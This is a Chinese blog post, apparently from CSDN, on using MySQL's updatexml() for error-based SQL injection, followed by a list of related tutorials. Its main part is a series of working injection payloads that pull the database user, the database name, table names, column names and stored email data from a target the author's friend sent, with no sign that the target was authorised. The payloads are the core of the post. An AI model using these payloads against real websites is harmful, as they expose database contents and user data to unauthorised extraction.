记一次简单的 updatexml报错注入

最新推荐文章于 2025-04-28 16:55:32 发布
最新推荐文章于 2025-04-28 16:55:32 发布
阅读量2.2k 收藏 6
点赞数 1
CC 4.0 BY-SA版权
分类专栏: web安全 文章标签: mysql报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ws13129/article/details/88778557
本文介绍了一种通过报错注入获取数据库信息的方法。利用MySQL的UPDATEXML函数和concat函数,可以构造特定的SQL语句,实现对数据库用户、数据库名称、表名、列名及具体数据的查询。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

朋友发的,问怎么注入
在这里插入图片描述
有大佬发了,报错注入。那就来锤他
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
mysql CONCAT()函数用于将多个字符串连接成一个字符串

查询用户updatexml(1,concat(0x7e,(select user()) ,0x7e),1)–+


查询数据库名称updatexml(1,concat(0x7e,(select database()) ,0x7e),1)–+

在这里插入图片描述
查表 updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=库的16进制 limit 0,1) ,0x7e),1)–+

在这里插入图片描述

查列名updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=库的16进制 and table_name= 0x70675F61646D696E5F636F6E666967 limit 2,1),0x7e),1)–+

在这里插入图片描述
查询具体数据updatexml(1,concat(0x7e,(select email from pg_admin_config limit 0,1),0x7e),1)–+
在这里插入图片描述

总结,简单无干扰的报错注入
updatexml(1,concat(0x7e,(普通注入语句),0x7e),1)–+基本就能注出数据了
写的很low,拒绝反驳

SQL注入报错注入
qq_68163788的博客
01-27 3295
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
【SQL注入-04】报错注入案例
m0_64378913的博客
04-26 1748
目录1 报错注入概述2 常用的报错注入命令2.2 group by重复键冲突(count()+floor()+rand()+group by组合)2.2.1 group by重复键冲突的原理及bug演示2.2.2 补充:sql语句解析过程2.3 XPATH报错2.3.1 extractvalue()函数2.3.2 updatexml()函数2.4 测试失败的命令3 报错注入案例3.1 操作环境3.2 获取敏感信息3.2.1 获取数据库名3.2.2 获取表名3.2.3 获取字段名3.2.4 获取字段内
MYSQL updatexml()函数报错注入解析
09-09
主要介绍了MYSQL updatexml()函数报错注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
sqli-labs-报错注入-updatexml报错
weixin_51706044的博客
03-14 1484
文章目录前言一、updatexml报错二、updatexml报错忆 前言 union注入是最简单方便的,但是要求页面必须有显示位,没有就没法利用. 所以当页面没有显示位时,我们需要用其他方法来获取数据.因此我们可以使用报错注入: 有些网站在开发调试阶段开启了报错提示信息,如果没有关闭,就有可能存在报错注入. 报错注入函数: floor函数 extractvalue报错 updatexml报错 今天我在这里先录一下对于updatexml报错函数的学习 一、updatexml报错 基本格式: ?id=
SQL报错注入updatexml
2301_78549931的博客
08-05 2861
第一个参数:XML的内容第二个参数:是需要update的位置XPATH路径第三个参数:是更新后的内容所以第一和第三个参数可以随便写,只需要利用第二个参数,他会校验你输入的内容是否符合XPATH格式,当我们输入一个不符合xpath语法的语句就报错了,我们注入利用的就是这一点。
updatexml报错注入
q1314q520q的博客
08-12 723
updatexml报错注入的使用。
updatexml()报错注入
最新发布
haishiqiguai的博客
04-28 1320
报错注入(Error-based SQL Injection)是一种通过故意触发数据库错误,并利用错误信息中泄露的敏感数据来实施攻击的SQL注入技术。其核心原理是利用数据库的异常处理机制,将攻击者需要的数据嵌入错误信息中返回。
深信服技术认证之基于floor( )函数的SQL报错注入
sangfor_edu的博客
06-07 1233
SQL注入(SQL Injection)是一种常见的Web安全漏洞,攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。...
渗透测试-百日筑基—SQL注入篇&联合&Boolean&报错&注入—中
LANDUOSHUREN的博客
10-23 1103
渗透测试-百日筑基-day7—SQL注入篇&注入的类型&流程&攻击union 联合注入原理1. 基本概念2. 攻击场景3. 攻击步骤4. 前置条件5. SQL注入中的UNION联合注入原理主要基于以下几个方面:6. 防御措施一、Union联合注入攻击1、上面详细介绍了原理,现在来分析有sql注入漏洞的代码,通过分析代码,更深入地了解sql注入漏洞2、当传入1时,页面正常返回用户信息3、如果传入1'语法会出现语句You have an error in your SQL syntax;这是mysql语法错
【网安第二章】SQL注入拓展——各种注入方法详细介绍
lyj1597374034的博客
08-28 922
目录找闭合符1. 描述2. 场景2.1场景一1. 搞清楚闭合符包含哪些符号2. 确定闭合符究竟是什么3.相关关卡2.2 场景二——未知正确输入的情况下1. 具体2.相关关卡确认是否存在注入点1. 描述2. 场景2.1 场景一——GET1. 具体2. 相关关卡2.2 场景二——POST1. 具体2. 相关关卡2.3 场景三——POST sqlmap1. 具体2. 相关关卡2.4 场景四——页面信息提示点1. 具体2. 相关关卡2.5 场景五——头部注入(UserAgent)1. 具体2. 相关关卡2.6 场景
SQL注入----报错注入简介(updatexml
一只web狗
06-21 3714
报错注入updatexml)常用语句
updatexml函数-报错注入原理学习
热门推荐
身高两米不到的博客
03-17 2万+
注入之前,首先得明白updatexml函数的利用方式以及函数语法。 updatexml(xml_doument,XPath_string,new_value) 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 以上是网上搜索的含义,看到以上内容,我不知道是不是有人和
SQL注入漏洞 | updatexml报错注入
weixin_52116519的博客
12-09 1207
XMLXML 被设计用来传输和存储数据,是各种应用程序之间进行数据传输的最常用的工具。xpathXPath 是一门在 XML 文档中查找信息的语言。XPath 使用路径表达式来选取 XML 文档中的节点或者节点集。这些路径表达式和我们在常规的电脑文件系统中看到的表达式非常相似。语法格式第一个参数:XML_document是String格式,为XML文档对象的名称第二个参数:XPath_string ,代表路径,Xpath格式的字符串,例如。
iwebsec-updatexml报错注入
m0_60984906的博客
03-18 528
iwebsec靶场sql注入updatexml报错注入
sqli-labs less-17 updatexml()报错注入
cuddlylm的博客
04-02 1805
这题相比前面的11到15关由原来的登陆注册框变成了现在的重置密码框 首先阅读源码发现 该题先审查user name的值,只有当user name的值是真值的时候才会处理下一步的new password 重点引入了update函数 $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; 这个函数的作用就是更新数据库 updatexml()函数 UPDATEXML (XML_document, XPath_string,.
【sqli-labs】Less 5——报错注入updatexml()函数)
用博客做做记录的小白
06-23 2937
sqli-labs靶场第五关less 5,使用报错注入函数updatexml()进行报错注入注入类型为单引号字符型。
sql盲注_updateXml报错注入
sugar_by的博客
06-03 601
函数updatexml(XML_document,XPath_string,new_value)包含三个参数 第一个参数是string格式,为XML文档对象名称,例如doc 第二个参数是路径 第三个参数是替换查找符合条件的数据 updatexml报错原理 同extractvalue()一样sql盲注_extractvalue报错注入 输入错误第二个参数,即更改路径的符号 正常语句 错误语句 利用updatexml()报错注入 判断字符型/数据型 判断闭合方式 可以判断为双引号闭合 查看有多少列 查询数据
报错注入updatexml函数使用
weixin_43326436的博客
06-03 4068
. floor()、extractvalue()、updatexml() 函数都是与报错注入有关 二.updatexml函数 使用方式: UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称。 第二个参数:XPath_string (Xpath格式的字符串) 。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 作用:改变文档中符合条件的节点的值。 还
报错注入(extractvalue,updatexml)
m0_73477772的博客
05-10 831
但是我们将第二个参数的斜杠替换为另外的符号extractvalue(doc,'~book/author/surname')例如:concat(1,2)的作用是将1,2两个位置的数据拼接起来,0x7e是’~‘的ascll码。这时候我们在第二个参数的位置加入SQL语句,则会返回我们想要的信息。第三个参数:new_value,string格式,替换查找到的符合条件的数据。第一个参数doc XML文档对象名称,第二个参数'____' 路径。如果我们把第二个参数的路径拼写错误,它会查不到内容但不会报错
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值